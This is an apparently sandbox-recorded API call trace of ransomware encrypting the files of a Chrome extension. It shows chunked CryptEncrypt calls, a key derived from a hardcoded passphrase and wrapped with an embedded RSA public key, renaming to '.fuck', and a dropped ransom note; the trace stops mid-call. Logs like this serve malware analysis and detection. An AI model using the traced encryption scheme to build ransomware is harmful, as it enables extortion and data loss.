1 [0263.258] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.259] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.259] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.259] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.259] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.259] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.259] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.259] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.260] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.260] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.260] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.260] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.260] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.260] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.260] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.260] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.260] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.260] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1fa, lpOverlapped=0x0) returned 1 [0263.260] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1fa, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x200) returned 1 [0263.260] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x200, lpOverlapped=0x0) returned 1 [0263.260] CloseHandle (hObject=0x5d5c) returned 1 [0263.260] CloseHandle (hObject=0x5d60) returned 1 [0263.260] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0263.263] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0263.264] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0263.265] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0263.266] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.266] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.266] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.266] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.266] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.267] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0263.267] AreFileApisANSI () returned 1 [0263.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.267] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.268] GetFileType (hFile=0x5d64) returned 0x1 [0263.268] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.269] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.269] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.269] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.269] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.269] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.269] GetLastError () returned 0x0 [0263.269] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json")) returned 0x20 [0263.270] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json", dwFileAttributes=0x80) returned 1 [0263.270] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.271] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.272] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.272] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.274] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.274] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.274] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.274] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.274] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.274] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.274] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75110) returned 1 [0263.274] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75110, dwCertEncodingType=0x1, pInfo=0x2ead5c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead5f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead5f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e440) returned 1 [0263.274] CryptEncrypt (in: hKey=0x2e7e440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.274] CryptEncrypt (in: hKey=0x2e7e440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75330*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75330*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.275] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e75330*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75330*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.275] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.314] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.314] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.320] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.320] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.320] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.321] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.321] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.321] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.321] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.321] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.321] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.322] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, 